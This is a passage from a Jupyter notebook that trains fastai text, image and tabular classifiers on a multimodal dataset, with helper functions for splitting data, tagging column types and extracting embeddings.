'img_path']}\\n===============================\")\ndata_path=['/content/drive/MyDrive/fastai_multimodal/datasets/', '/content/drive/MyDrive/tf_multimodal/datasets/', '/content/drive/MyDrive/techskills_data/'][0]\n# define df, label_col, img_path\ndf = pd.read_csv(data_path+config_df.loc[i,'data_file'], nrows=nrows, index_col=0)\nlabel_col=config_df.loc[i, 'label_col']\nimg_path=config_df.loc[i, 'img_path']\n\n# keep a copy of experiment config\nconfig = {'df':df,\n 'data_path':data_path,\n 'data_file':config_df.loc[i,'data_file'],\n 'label_col':label_col,\n 'img_path':img_path,\n 'nrows':nrows}\n\ndf.tail()\n", "===========experiment config===========\n nrows=500 \n data_file=df_entailment.csv\n label_col=label\n img_path=/root/.keras/datasets/tweet_images\n===============================\n" ], [ "df[label_col].value_counts()/df.shape[0]", "_____no_output_____" ] ], [ [ "# train test split", "_____no_output_____" ] ], [ [ "#export\ndef split_train_valid_test(df, train_valid_test=[0.7,0.15, 0.15], target='response_status', random_state=123, sort_split_by_col='start_datetime'):\n '''Splits a Pandas Dataframe into training, evaluation and serving sets, stratifying on target column.\n\n Args:\n df : pandas dataframe to split\n train_valid_test: a list of 3 positive numbers, each being either float or integer\n target (string): the name of target column\n random_state (int or None): the random seed to shuffle df; if None, do not shuffle df\n sort_split_by_col (str or list of str) e.g.'index', 'start_datetime' or ['start_datetime','event_end_datetime']\n Returns:\n train_df: Training dataframe(i.e. 70% of the entire dataset)\n valid_df: Evaluation dataframe (i.e. 15% of the entire dataset) \n test_df: Serving dataframe (i.e. 15% of the entire dataset, label column dropped)\n keep_datetime_order (default True): after splitting data into train < validation < serving\n Ref:\n C2W1_assignment.ipynb using TFDV to visulize, validate and moritor data at scale\n '''\n if len(train_valid_test)==3 and not any(x < 0 for x in train_valid_test):\n tot = sum(train_valid_test)\n train_valid_test = [x/tot for x in train_valid_test]\n else: \n raise ValueError('train_valid_test need to be a list of 3 positive numbers!')\n\n if sort_split_by_col is not None:\n if sort_split_by_col=='index':\n df.sort_index(inplace=True) #for ui, datetime info is stored in df.index\n df.reset_index(drop=False, inplace=True)\n \n ls = list(range(df.shape[0])) #range_of(df) \n df.sort_values(by=sort_split_by_col, inplace=True)\n ls_train = ls[:int(df.shape[0]*train_valid_test[0])]\n train_cut_date = df.iloc[ls_train[-1],:][sort_split_by_col]\n train_df = df[df[sort_split_by_col]<=train_cut_date]\n\n ls_test = ls[:int(df.shape[0]*sum(train_valid_test[0:2]))]\n test_cut_date = df.iloc[ls_test[-1],:][sort_split_by_col]\n test_cut_date = max(test_cut_date, train_cut_date)\n test_df = df[df[sort_split_by_col]>test_cut_date]\n\n try: valid_df=df[df[sort_split_by_col]>train_cut_date & df[sort_split_by_col]<=test_cut_date]\n except: valid_df = pd.DataFrame()\n\n ls_train = ls[:int(train_df.shape[0])]\n ls_test = ls[-int(test_df.shape[0]):]\n try: ls_valid = ls[int(train_df.shape[0]):-int(test_df.shape[0])]\n except: ls_valid = []\n n_train, n_valid, n_serv = train_df.shape[0], valid_df.shape[0], test_df.shape[0]\n print('================Double check the indices of train, valid and test are sorted: =================== ')\n print(f'train_df={df.iloc[:n_train,:][sort_split_by_col]}/n')\n print(f'valid_df={df.iloc[n_train:(n_train+n_valid),:][sort_split_by_col]}/n')\n print(f'test_df={df.iloc[(n_train+n_valid):,:][sort_split_by_col]}')\n df.reset_index(drop=True, inplace=True)\n train_df, valid_df, test_df = df.iloc[:n_train,:], df.iloc[n_train:(n_train+n_valid),:], df.iloc[(n_train+n_valid):,:]#.drop([target], axis=1)\n return train_df, valid_df, test_df# X_test, y_test\n\n # downstream dl clf can not accept datetime index, therefore df.reset_index() \n df.reset_index(drop=True, inplace=True)\n from sklearn.model_selection import train_test_split\n train_df, eval_serv = train_test_split(df, stratify=df[target], test_size = 1 - train_valid_test[0], random_state=random_state)\n if train_valid_test[1]>0:\n valid_df, test_df = train_test_split(eval_serv, stratify=eval_serv[target], test_size = train_valid_test[1]/(1 - train_valid_test[0]), random_state=random_state)\n else:\n valid_df, test_df = None, eval_serv\n # Serving data emulates the data that would be submitted for predictions, so it should not have the label column.\n #y_test = test_df[target]\n #X_test = test_df.drop([target], axis=1)\n\n return train_df, valid_df, test_df\n\n\n", "_____no_output_____" ], [ "# split df into train_df & test_df NOTE: random split by setting `sort_split_by_col=None`\nif i==4:\n sort_split_by_col='start_datetime'\nelse:\n sort_split_by_col=None\ntrain_df, _, test_df = split_train_valid_test(df, train_valid_test=[0.7,0, 0.3], target=label_col, random_state=123, sort_split_by_col=sort_split_by_col)\ntrain_df.shape, test_df.shape", "_____no_output_____" ] ], [ [ "# identify cnt_cols, cat_cols, txt_cols, img_cols", "_____no_output_____" ] ], [ [ "#export\nimport requests\n\ndef check_path(path):\n \"\"\"check if path is a valid directory or not\"\"\"\n try:\n return os.path.exists(os.path.dirname(path))\n except:\n return False\ndef check_url(path):\n \"\"\"check if path is a valid url or not\"\"\"\n try: return requests.get(path)\n except:\n if 'http' in path:\n return True\n else:\n return False\n\ndef cnt_cat_txt_img_split(df:pd.DataFrame, cnt_card=0.5, excluded_cols = [label_col], txt_card=0.5):\n \"\"\"Helper function that returns column names of cnt, cat (furtherly split into int_cat, str_cat), txt variables from given df.\n Args: \n df\n cnt_card (int or float within 0 and 1): cnt cardinarity, e.g. ratio of unique values for cnt column\n label (str default None): the target/dependant varible column name\n txt_card (int or float within 0 and 1): txt cardinarity, e.g. ratio of unique values for txt column\n Return:\n txt_cols, cnt_cols, cat_cols, (int_cat_cols, str_cat_cols), img_cols: (list of str)\n Example:\n txt_cols, cnt_cols, cat_cols, (int_cat_cols, str_cat_cols), img_cols = cnt_cat_txt_split(df, cnt_card=80, label='target', txt_card=0.5)\n\n \"\"\"\n # init placeholder for cnt, cat (int_cat, str_cat), txt\n cnt_cols, cat_cols, txt_cols, img_cols = [], [], [], []\n int_cat_cols, str_cat_cols = [], []\n\n # prep cnt cardinality & txt cardinality\n if cnt_card < 1:\n print(f'before adjustment...cnt_card={cnt_card}')\n cnt_card = int(df.shape[0]*cnt_card)\n print(f'before adjustment...cnt_card={cnt_card}')\n if txt_card < 1:\n print(f'before adjustment...txt_card={txt_card}')\n txt_card = int(df.shape[0]*txt_card)\n print(f'before adjustment...txt_card={txt_card}')\n # exclude target\n cols = set(df.columns) - set(excluded_cols)\n\n # separate cnt, cat, txt columns\n for col in cols:\n if ((pd.api.types.is_integer_dtype(df[col].dtype) and\n df[col].unique().shape[0] > cnt_card) or\n pd.api.types.is_float_dtype(df[col].dtype)): #add to cnt_cols\n cnt_cols.append(col)\n elif (pd.api.types.is_string_dtype(df[col].dtype) and\n df[col].unique().shape[0] > txt_card):\n if all(['.png' in x or '.jpg' in x for x in df[col].sample(10)]): # and (all([check_url(path) for path in df[col].sample(10)]) or all([check_path(path) for path in df[col].sample(10)])): #check 10 samples to see if they are either valid url or valid path \n img_cols.append(col)\n else: #add to txt_cols\n txt_cols.append(col)\n else: #add to cat_cols\n cat_cols.append(col)\n if pd.api.types.is_integer_dtype(df[col].dtype): #separate cat_cols into int_cat_cols and str_cat_cols\n int_cat_cols.append(col)\n else:\n str_cat_cols.append(col)\n return sorted(txt_cols), sorted(cnt_cols), sorted(cat_cols), (sorted(int_cat_cols), sorted(str_cat_cols)), sorted(img_cols)", "_____no_output_____" ], [ "# determine cnt, cat, txt, img columns and define global variables\ntxt_cols, cnt_cols, cat_cols, (int_cat_cols, str_cat_cols), img_cols= cnt_cat_txt_img_split(df=df, cnt_card=20, excluded_cols = [label_col], txt_card=0.1)\nprint(f'Given label_col={label_col}\\n======= automatically identify \\n cnt_cols={cnt_cols}\\n cat_cols={cat_cols},\\n img_cols={img_cols}, \\n txt_cols={txt_cols} \\n======= make sure that is what you expect!')\n", "before adjustment...txt_card=0.1\nbefore adjustment...txt_card=50\nGiven label_col=label\n======= automatically identify \n cnt_cols=[]\n cat_cols=[],\n img_cols=['image_1_path', 'image_2_path'], \n txt_cols=['text_1', 'text_2'] \n======= make sure that is what you expect!\n" ], [ "if i ==4: #manually adjust\n cnt_cols=['age', 'cumulative_peer_exit_count', 'is_optional', 'is_organizer', 'length_of_service', 'manager_length_of_service', 'meeting_lapse', 'num_direct_reports', 'start_datetime_Dayofyear', 'time_since_last_promotion', 'time_since_new_manager_start_date', 'time_since_new_org_start_date', 'timestamp']\n cat_cols=[ 'job_family', 'start_datetime']\n img_cols=[]\n txt_cols=['description', 'title']\n excluded_cols=['event_id',]\n x_cols = cnt_cols+cat_cols+img_cols+txt_cols\n i_cols = ['description', 'title', 'start_datetime', 'meeting_lapse', 'start_datetime_Dayofyear', 'timestamp'] # item features\n u_cols = list(set(x_cols)-set(i_cols)) # user features\n\n print(f'meeting features: {i_cols}') # to generate item embeddings\n print(f'user features: {u_cols}') # to generate user embeddings", "_____no_output_____" ], [ "# store column-info in a unchangable variable\nclass CONST(object):\n __slots__ = ()\n cat_cols = cat_cols\n cnt_cols = cnt_cols\n txt_cols = txt_cols\n img_cols = img_cols\n label_col = label_col\n\n\nc = CONST()\nc.cat_cols, c.cnt_cols, c.txt_cols, c.img_cols", "_____no_output_____" ] ], [ [ "# 1) fastai text classifier\n\nThe limitation of fastai text classifier is that it only accept 1 txt_col. To deal with this limitation, I have 2 options:\n\n- run fastai text classifier through each of txt_cols and then later combine the output through some ensemble learner.\n\n- combine all txt_cols into one text col and run fastai text classifier", "_____no_output_____" ], [ "## module1: train|reload|inference with fastai_text_classifier", "_____no_output_____" ] ], [ [ "#export\n#! [ -e /content ] && pip install -Uqq fastai # upgrade fastai on colab\n#from fastai.text.all import *\n\ndef train_fastai_text_classifier(df:pd.DataFrame, txt_col:str, label_col:str, model_path:str, lr:float=0.005, max_epochs:int=100, emb_size:int=128):\n \"\"\"train a fastai text classifier and get its performance metrics\n Args:\n df:pd.DataFrame the dataframe containing text_col and label_col\n txt_col:str e.g. 'hard_skills_name' \n label_col:str e.g. 'label'\n model_path:str e.g. '/content/drive/My Drive/techskills/model/'\n flag_auto_lr:bool=False whether or not use auto search learning rate; if False, use default value 0.005 \n max_epochs:int=100\n emb_size:int=128\n Returns:\n lm: the trained language model\n clf: the trained fastai text classification model \n \"\"\"\n\n #metrics\n f1=FBeta(beta=1, average='weighted')\n precision = Precision(average='weighted')\n recall = Recall(average='weighted')\n metrics=[accuracy, precision, recall, f1]\n \n # get `dataloader` object for language model\n dls_lm = TextDataLoaders.from_df(df[[txt_col, label_col]], is_lm=True, text_col=txt_col, label_col=label_col, valid_pct=0.2, seed=123)\n\n #-----build a language model\n # init language model\n \"\"\"config = awd_lstm_lm_config.copy()\n config['emb_sz'] = emb_size\"\"\"\n lm = language_model_learner(dls_lm, AWD_LSTM, drop_mult=0.5, metrics=[accuracy, Perplexity()], wd=0.1).to_fp16()\n\n # auto learning rate for lm\n if lr is None:\n lr_lm=list(lm.lr_find())[0]\n print(f'auto identified learning rate lr_lm={lr_lm}')\n else:\n lr_lm = lr\n # train lm learner\n lm.fit_flat_cos(max_epochs, cbs=[EarlyStoppingCallback()], lr=slice(lr_lm/(2.6**4), lr_lm))\n\n # furtherly fine tune lm learner\n #lm.fit_one_cycle(5, slice(lr_lm/10,lr_lm * 10))\n\n # Create model_path if it does not exist \n import os\n if not os.path.exists(model_path):\n os.makedirs(model_path)\n\n # save lm and its encoder; The model not including the final layer is called the encoder\n lm.save(model_path+txt_col+'_lm')\n lm.save_encoder(model_path+txt_col+'_lm_encoder')\n\n #======build a text classifier\n # get `dataloader` object for classification model;\n dls_clf = TextDataLoaders.from_df(df[[txt_col, label_col]], text_col=txt_col, label_col=label_col, valid_pct=0.2, seed=123, text_vocab=dls_lm.vocab)\n clf = text_classifier_learner(dls_clf, AWD_LSTM, drop_mult=0.5, metrics=metrics).to_fp16()\n clf.load_encoder(model_path+txt_col+'_lm_encoder')\n\n # auto learning rate\n if lr is None:\n lr_clf=list(clf.lr_find())[0]\n print(f'auto identified learning rate lr_clf={lr_clf}')\n else:\n lr_clf = lr\n # train learner\n clf.fit_flat_cos(max_epochs, cbs=[EarlyStoppingCallback()], lr=slice(lr_clf/(2.6**4), lr_clf))\n\n # furtherly fine tune clf learner\n #clf.fit_one_cycle(5, slice(lr_clf/(2.6**4), lr_clf))\n\n #unfreeze all except the last 2 layers & retrain\n clf.freeze_to(-2)\n clf.fit_one_cycle(1, slice(lr_clf/(2.6**4), lr_clf))\n\n #unfreeze all except the last 3 layers & retrain\n clf.freeze_to(-3)\n clf.fit_one_cycle(1, slice(lr_clf/(2.6**4), lr_clf))\n\n # last, unfreeze the whole model & retrain\n clf.unfreeze()\n #clf.fit_one_cycle(5, slice(1e-3/(2.6**4),1e-3))\n clf.fit_flat_cos(100, cbs=[EarlyStoppingCallback()], lr=slice(lr_clf/(2.6**4), lr_clf))\n\n # save the state of the model, it create a file in `learn.path/models/` named 'baseline_model.pth'\n clf.save(model_path+txt_col+'_classifier')\n return lm, clf\n\ndef load_fastai_text_classifier(df:pd.DataFrame, txt_col:str, label_col:str, model_path:str, lr:float=0.005):\n \"\"\"train a fastai text classifier and get its performance metrics\n Args:\n df:pd.DataFrame the dataframe containing text_col and label_col\n txt_col:str e.g. 'hard_skills_name' \n label_col:str e.g. 'label'\n model_path:str e.g. '/content/drive/My Drive/techskills/model/'\n lr:float=0.005\n #emb_size:int=128\n #flag_auto_lr:bool=False whether or not use auto search learning rate; if False, use default value 0.005 \n Returns:\n lm: the trained language model\n clf: the trained fastai text classification model \n \"\"\"\n\n #metrics\n f1=FBeta(beta=1, average='weighted')\n precision = Precision(average='weighted')\n recall = Recall(average='weighted')\n metrics=[accuracy, precision, recall, f1]\n \n # get `dataloader` object for language model\n dls_lm = TextDataLoaders.from_df(df[[txt_col, label_col]], is_lm=True, text_col=txt_col, label_col=label_col, valid_pct=0.2, seed=123)\n\n #-----build a language model\n # init language model\n \n lm = language_model_learner(dls_lm, AWD_LSTM, drop_mult=0.5, metrics=[accuracy, Perplexity()], wd=0.1).to_fp16()\n\n # save lm and its encoder; The model not including the final layer is called the encoder\n lm.load(model_path+txt_col+'_lm')\n lm.load_encoder(model_path+txt_col+'_lm_encoder')\n\n #======build a text classifier\n # get `dataloader` object for classification model;\n dls_clf = TextDataLoaders.from_df(df[[txt_col, label_col]], text_col=txt_col, label_col=label_col, valid_pct=0.2, seed=123, text_vocab=dls_lm.vocab)\n clf = text_classifier_learner(dls_clf, AWD_LSTM, drop_mult=0.5, metrics=metrics).to_fp16()\n clf.load_encoder(model_path+txt_col+'_lm_encoder')\n\n\n # save the state of the model, it create a file in `learn.path/models/` named 'baseline_model.pth'\n try: \n clf.load(model_path+txt_col+'_classifier')\n except: # in case can not load the trained classifier, retrain it\n # auto learning rate\n if lr is None:\n lr_clf=list(clf.lr_find())[0]\n print(f'auto identified learning rate lr_clf={lr_clf}')\n else:\n lr_clf = 0.005\n # train learner\n clf.fit_flat_cos(100, cbs=[EarlyStoppingCallback()], lr=lr_clf)\n \n # furtherly fine tune clf learner\n #clf.fit_one_cycle(5, slice(lr_clf/10, lr_clf*10))\n\n #unfreeze all except the last 2 layers & retrain\n clf.freeze_to(-2)\n clf.fit_one_cycle(1, slice(1e-2/(2.6**4),1e-2))\n\n #unfreeze all except the last 3 layers & retrain\n clf.freeze_to(-3)\n clf.fit_one_cycle(1, slice(5e-3/(2.6**4),5e-3))\n\n # last, unfreeze the whole model & retrain\n clf.unfreeze()\n clf.fit_one_cycle(5, slice(1e-3/(2.6**4),1e-3))\n # save the state of the model, it create a file in `learn.path/models/` named 'title_raw_classifier.pth'\n clf.save(model_path+txt_col+'_classifier')\n return lm, clf\n\ndef fastai_learner_preds(learner, df, label_col, txt_col:str=None):\n \"\"\"use a trained fastai learner to make prediction on df[txt_col] \n Args:\n learner: a trained fastai text learner (model)\n test_df:pd.DataFrame e.g. df[[img_col]]\n txt_col:str=None e.g. 'Skills_resume', 'title_raw'\n ATTENSION: test_df need to have the same features which learner was trained on \n Returns:\n preds:np.array of shape (num_samples,)\n probs:np.array of shape (num_samples, num_classes)\n Example:\n #make sure the txt_col is renamed as 'text'\n df = df[[txt_col]].copy().rename({txt_col:'text'}, axis=1)\n\n #make sure NaN value (of which the dtype is of np numeric) is replaced by '' (dtype is str)\n df['text'].fillna('', inplace=True)\n\n preds, probs = fastai_learner_preds(learner=clf0, df)\n \n \"\"\"\n # in case of deal with txt_col, do some preprocessing on test_df[[txt_col]]\n if txt_col is not None: \n #make sure the txt_col is renamed as 'text'\n df = df[[txt_col]].copy().rename({txt_col:'text'}, axis=1)\n\n #make sure NaN value (of which the dtype is of np numeric) is replaced by '' (dtype is str)\n df['text'].fillna('', inplace=True)\n test_df = df.copy()\n if label_col in test_df.columns:\n test_df.drop([label_col], axis=1, inplace=True)\n dl = learner.dls.test_dl(test_df) #, with_labels=True\n probs, _ = learner.get_preds(dl=dl)\n preds = probs.numpy().argmax(axis=1)\n return preds, probs\n", "_____no_output_____" ], [ "\"\"\"# train txt classifier(s), each is corresponding to every txt_cols\nlms=[]\ntxt_clfs=[]\n\nfor txt_col in txt_cols:\n lm0, txt_clf0 = train_fastai_text_classifier(df, \n txt_col=txt_col,\n label_col=label_col,\n model_path='/content/drive/My Drive/fastai_multimodal/model/',\n lr=0.005\n )\n lms.append(lm0)\n txt_clfs.append(txt_clf0)\"\"\"\n", "_____no_output_____" ], [ "\"\"\"# re-load each text classifier trained w. each of txt_cols\nlms=[]\ntxt_clfs=[]\n\nfor txt_col in txt_cols:\n lm0, clf0 = load_fastai_text_classifier(df, \n txt_col=txt_cols[0],\n label_col=label_col,\n model_path='/content/drive/My Drive/fastai_multimodal/model/',\n lr=0.005\n )\n lms.append(lm0)\n txt_clfs.append(txt_clf0)\"\"\"\n ", "_____no_output_____" ] ], [ [ "## module: get_fastai_docs_embs\n\nInstead of using out of box embedding methods (tfidf, USE, SBERT), I want to use classifier based embedding method to calculate document embedding.\n\nReferences:\n\n- [Getting Document Encodings From ULMFiT (updated for Fastai v2)](https://alanjjian.medium.com/getting-document-encodings-from-ulmfit-updated-for-fastai-v3-7444904011fe)\n\n- [Tutorial on SPAM detection using fastai ULMFiT - Part 1: Language Model](https://drive.google.com/drive/u/0/folders/13uo91qC4cUFPepeRCg5XXoBCFqg3Q2Mn)\n", "_____no_output_____" ] ], [ [ "#export\ndef get_fastai_docs_embs(docs:list, learn, lm, df=None, txt_col=None):\n \"\"\"use classifier to get document embedding vector (np.array)\n Args:\n docs:list of str e.g. ['Python (programming language)', 'Data Science', 'git, GitHub, NLP']\n learn: e.g. fastai.text.learner.TextLearner\n lm: e.g. fastai.text.learner.LMLearner language model to generate numericalizer and tokenizer\n df[txt_col] to generate language model's dataloader (dls_lm), numericalizer and tokenizer\n Returns:\n embs: a num_samples long list of 400D vector\n\n Examples:\n get_docs_embs(docs=['Python (programming language)', 'Data Science', 'git, GitHub, NLP'], learn=clf1, lm=lm1, df=None, txt_col=None)\n get_docs_embs(docs=['Python (programming language)', 'Data Science', 'git, GitHub, NLP'], learn=clf1, lm=None, df=df, txt_col=txt_cols[1])\n \"\"\"\n # Utilize DataBlock API to process and load data\n if (df is not None) and (txt_col is not None):\n dls_lm = DataBlock(blocks=TextBlock.from_df(text_cols=txt_col, is_lm=True),\n get_x=ColReader('text'),\n splitter=RandomSplitter(0.1)).dataloaders(df, bs=128,seq_len=80) \n numericalizer = Numericalize(vocab=dls_lm.vocab)\n tokenizer = dls_lm.tokenizer\n elif lm is not None:\n numericalizer = Numericalize(vocab=lm.dls.vocab)\n tokenizer = lm.dls.tokenizer\n \n #preprocess docs\n embs = []\n for doc in docs:\n xb = numericalizer(tokenizer(doc))\n xb = xb.reshape((1, xb.size()[0]))\n awd_lstm = learn.model[0]\n awd_lstm.reset()\n with torch.no_grad():\n try:\n out = awd_lstm.eval()(xb.cuda()) #to deal with 'all-tensors-to-be-on-the-same-device error', add `.cuda(). Ref: https://stackoverflow.com/questions/64929665/pytorch-running-runtimeerror-expected-all-tensors-to-be-on-the-same-device-bu\n except:\n out = awd_lstm.eval()(xb) \n embs.append(out[0].cpu().max(0).values.detach().numpy().sum(axis=0).reshape(-1,)) #out[0].cpu() is to copy tensor from GPU(cuda) to CPU\n return embs\n\n", "_____no_output_____" ], [ "\"\"\"# load lm and clf based on txt_cols[0]\nlm, clf = load_fastai_text_classifier(df, \n txt_col=txt_cols[0],\n label_col=label_col,\n model_path='/content/drive/My Drive/fastai_multimodal/model/',\n lr=0.005\n )\"\"\"\n", "_____no_output_____" ], [ "\"\"\"#dbck: expect the 2 set of vectors producted by the 2 methods are highly correlated \n# get docs embeddings e1 by method1\ne1 = get_fastai_docs_embs(docs=df[txt_cols[0]] #['Python (programming language)', 'Data Science', 'git, GitHub, NLP']\n, learn=clf, lm=lm, df=None, txt_col=None)\n# get docs embeddings e2 by method2\ne2 = get_fastai_docs_embs(docs=df[txt_cols[0]] #['Python (programming language)', 'Data Science', 'git, GitHub, NLP']\n, learn=clf, lm=None, df=df, txt_col=txt_cols[0])\n\n#dbck: compute cosine similarity bw e1 and e2, expect the similarity is closed to 1\nfrom sklearn.metrics.pairwise import cosine_similarity as cs\n[cs(x1.reshape(1,-1),x2.reshape(1,-1)) for (x1,x2) in zip(e1, e2)]\npd.DataFrame(e1).shape\n\"\"\"", "_____no_output_____" ], [ "#pd.DataFrame(e1, index=df.index)", "_____no_output_____" ], [ "#pd.DataFrame(e2, index=df.index)", "_____no_output_____" ] ], [ [ "# 2) fastai image classifier\n", "_____no_output_____" ] ], [ [ "#export\n#from fastai.vision.all import *\n\ndef train_fastai_image_classifier(df:pd.DataFrame, label_col:str, img_col:str, img_path:str, model_path:str, model_name:str, lr:float=0.005, max_epochs:int=100, img_size:int=224, bs:int=64, emb_size:int=128):\n \"\"\"train and evaluate a fastai image classifier, where image data is stored under `path`, where df stores the path of each image file\n Args:\n df:pd.DataFrame, \n img_col:str,\n img_path:str, the folder where the images are stored e.g. '/root/.fastai/data/mnist_tiny'\n model_path:str, the folder where the image classifier is stored\n model_name:str, \n lr:float=0.005, \n max_epochs:int=100\n img_size:int=224,\n emb_size:int=128 embedding size \n bs:int=64\n Returns:\n img_learn: a trained image classifier\n\n\n Example:\n path = untar_data(URLs.MNIST_TINY)\n df = pd.read_csv(path/'labels.csv')\n print(df)\n img_col='name'\n label_col='label'\n img_path = '/root/.fastai/data/mnist_tiny'\n img_clf = train_fastai_image_classifier(df=df, img_col=img_col, img_path=img_path, model_path='.', model_name='img_clf', lr=None, max_epochs=100)\n \"\"\"\n # make sure df[[img_col]] is without img_path in it\n import re\n def f(row, img_path=img_path):\n #make sure img_path ended with '/' e.g. img_path='/root/.keras/datasets/tweet_images/'\n if img_path[-1]!='/':\n img_path+='/'\n return re.sub(img_path, '', row)\n \n df[img_col] = df[img_col].apply(lambda row: f(row))\n print(f'==========dbck df[[img_col]] is without img_path={img_path} in it===========\\n{df[[img_col]].head()}')\n\n # load images fr df into dls\n from pathlib import Path \n def get_dls(emb_size, bs):\n \"\"\" unify the size of input images on a batch, in order to deal with the following Error:\n RuntimeError: stack expects each tensor to be equal size, but got [3, 298, 273] at entry 0 and [3, 480, 480] at entry 1\n Ref: https://forums.fast.ai/t/what-to-do-if-raw-image-is-very-large-cpu-bottleneck/88432/2\n \"\"\"\n dls = ImageDataLoaders.from_df(df,\n path=Path(img_path),\n fn_col=img_col, #'path'\n #valid_col='is_val',\n label_col=label_col,#'target',\n y_block=CategoryBlock,\n item_tfms=Resize(emb_size, method=ResizeMethod.Squish),\n batch_tfms=aug_transforms(size=img_size),\n bs=bs)\n\n return dls\n\n dls = get_dls(emb_size=emb_size, bs=bs) # replace: dls = ImageDataLoaders.from_df(df=df,fn_col=img_col, label_col=label_col, path=Path(img_path))\n \n f1=FBeta(beta=1, average='weighted')\n precision = Precision(average='weighted')\n recall = Recall(average='weighted')\n metrics=[error_rate, accuracy, precision, recall, f1]\n img_learn = cnn_learner(dls, resnet34, metrics=metrics)\n\n # find optimal learner rate lr\n if lr is None:\n lr=list(img_learn.lr_find())[0]\n\n # fit learner\n img_learn.fit_flat_cos(100, cbs=[EarlyStoppingCallback()], lr=lr)\n\n #unfreeze all except the last 2 layers & retrain\n img_learn.freeze_to(-2)\n img_learn.fit_one_cycle(1, slice(lr/(2.6**4),lr))\n\n #unfreeze all except the last 3 layers & retrain\n img_learn.freeze_to(-3)\n img_learn.fit_one_cycle(1, slice(lr/(2.6**4),lr))\n\n # last, unfreeze the whole model & retrain until it making no progress in val_lose\n img_learn.unfreeze()\n #replace: img_learn.fit_one_cycle(epochs, slice(lr/(2.6**4),lr))\n img_learn.fit_flat_cos(max_epochs, cbs=[EarlyStoppingCallback()], lr=slice(lr/(2.6**4),lr))\n\n # save the state of the model, it create a file in `learn.path/models/` named 'baseline_model.pth'\n img_learn.save(model_path+model_name)\n return img_learn\n\n#img_clf = train_eval_fastai_image_classifier(df=df, img_col=img_col, img_path=img_path, model_path='.', model_name='img_clf', lr=None, max_epochs=100)\n", "_____no_output_____" ], [ "\"\"\"#example1\npath = untar_data(URLs.MNIST_TINY)\ndf_ = pd.read_csv(path/'labels.csv')\nprint(df_)\nimg_col_='name'\nlabel_col_='label'\nimg_path_ = '/root/.fastai/data/mnist_tiny'\nimg_clf, dls = train_fastai_image_classifier(df=df_,label_col=label_col_, img_col=img_col_, img_path=img_path_, model_path='.', model_name='img_clf', lr=None, max_epochs=100)\n\"\"\"", "_____no_output_____" ], [ "\"\"\"# another example\nif len(img_cols)>0:\n img_clf = train_fastai_image_classifier(df=df, \n label_col=label_col, \n img_col=img_cols[0], \n img_path='/root/.keras/datasets/tweet_images', \n model_path='/content/drive/My Drive/fastai_multimodal/model/',\n model_name=img_cols[0]+'_clf', \n lr=0.005, \n max_epochs=100)\"\"\"\n", "_____no_output_____" ] ], [ [ "## module: get_fastai_imgs_embs()", "_____no_output_____" ] ], [ [ "#export\ndef get_fastai_imgs_embs(img_clf, df:pd.DataFrame=None, img_col:str=None):\n \"\"\"use classifier to get image embedding vector (np.array)\n Args:\n img_clf: e.g. fastai.learner.Learner\n df[[img_col]] store the path of image files\n Returns:\n embs: a np.array of shape (num_samples, 512)\n\n Examples: \n img_embs = get_fastai_imgs_embs(img_clf=img_clf, df=df.head(5), img_col='name')\n \n \"\"\"\n # define pytorch hook\n class SaveFeatures():\n features=None\n def __init__(self, m): \n self.hook = m.register_forward_hook(self.hook_fn)\n self.features = None\n def hook_fn(self, module, input, output): \n out = output.detach().cpu().numpy()\n if isinstance(self.features, type(None)):\n self.features = out\n else:\n self.features = np.row_stack((self.features, out))\n def remove(self): \n self.hook.remove()\n # identify the layer from which you want to get embeddings\n #print(img_clf.model) \n print(f'====== We will get embedding from {img_clf.model[1][4]} =======')\n emb_layer = img_clf.model[1][4]\n #put hook on the selected emb_layer\n sf = SaveFeatures(emb_layer)\n\n # access dls from the trained classifier\n test_df = df[[img_col]]\n test_dl = img_clf.dls.test_dl(test_df, with_labels=False)\n \n # run img_clf through test data\n preds, _ = img_clf.get_preds(dl=test_dl)\n # get the embeddings of test data\n embs = sf.features\n \n return embs\n\n", "_____no_output_____" ], [ "\"\"\"#dbck\nimg_embs = get_fastai_imgs_embs(img_clf=img_clf, df=df.head(), img_col=img_cols[0])\nimg_embs.shape\"\"\"", "_____no_output_____" ] ], [ [ "# 3) fastai tabular classifer", "_____no_output_____" ] ], [ [ "#export\n\n#from fastai.tabular.all import *\n\ndef split_idxs(df, train_size=.9, flag_random_split=True):\n \"\"\" split df index into 2 parts: train_idxs and test_idxs \n Args:\n df: the dataframe of all your data\n train_size (float in [0,1], default 0.9)\n flag_random_split(bool, default False): do you want random split idxs?\n Returns:\n (ls_train, ls_test): a 2-tuple of lists for train indices and test indices\n\n Example:\n df = pd.DataFrame({'c1':list(range(26)), 'c2':list(string.ascii_lowercase)})\n splits = split_idxs(df)\n ...\n # use splits to build TabularPandas taublar object\n to = TabularPandas(df, \n procs=procs,\n cat_names=cat_names,\n cont_names=cont_names,\n y_names=y_names,\n y_block=y_block,\n splits=splits)\n \"\"\"\n import random\n ls = range_of(df)\n print(ls)\n if flag_random_split:\n splits = RandomSplitter()(ls)\n else:\n ls_train = ls[:int(df.shape[0]*train_size)]\n ls_test = ls[int(df.shape[0]*train_size):]\n random.shuffle(ls_train)\n random.shuffle(ls_test)\n splits = (ls_train, ls_test)\n return splits\n\ndef train_fastai_tabular_classifier(df:pd.DataFrame, label_col:str, cnt_cols:list=None, cat_cols:list=None, lr:float=0.005, max_epochs:int=100, model_path:str='/content/drive/My Drive/techskills/model/', model_name:str='tabular_model'):\n \"\"\"train an ensembled classifier input with embs_ls, which is a list of embeddings\n Args:\n df:pd.DataFrame,\n label_col:str,\n cnt_cols:list of str\n cat_cols:list of str\n lr:float=0.005 learning rate\n max_epochs:int=10 number of epochs to train a tabular learner when unfreeze the whole model\n model_path:str='/content/drive/My Drive/techskills/model/', \n model_name:str='tabular_model', \n Returns:\n tab_learner: a trained fastai tabular classifier\n \"\"\"\n if cnt_cols is None or cat_cols is None:\n txt_cols, cnt_cols, cat_cols, (int_cat_cols, str_cat_cols), img_cols = cnt_cat_txt_img_split(df, cnt_card=.5, excluded_cols = [label_col], txt_card=0.5)\n print(f'** Given label_col={label_col} ** \\n======= automatically identify\\n cnt_cols={cnt_cols}\\n cat_cols={cat_cols},\\n img_cols={img_cols}, \\n txt_cols={txt_cols} \\n======= make sure that is what you expect; otherwise, manually make changes')\n\n # define variables\n y_names = label_col\n cat_names = cat_cols\n cont_names = cnt_cols\n tab_cols = [label_col]+cnt_cols+cat_cols\n\n # build fastai tabular dataloader \n procs = [Categorify, FillMissing, Normalize]\n splits = split_idxs(df[tab_cols], train_size=.9, flag_random_split=True)\n to = 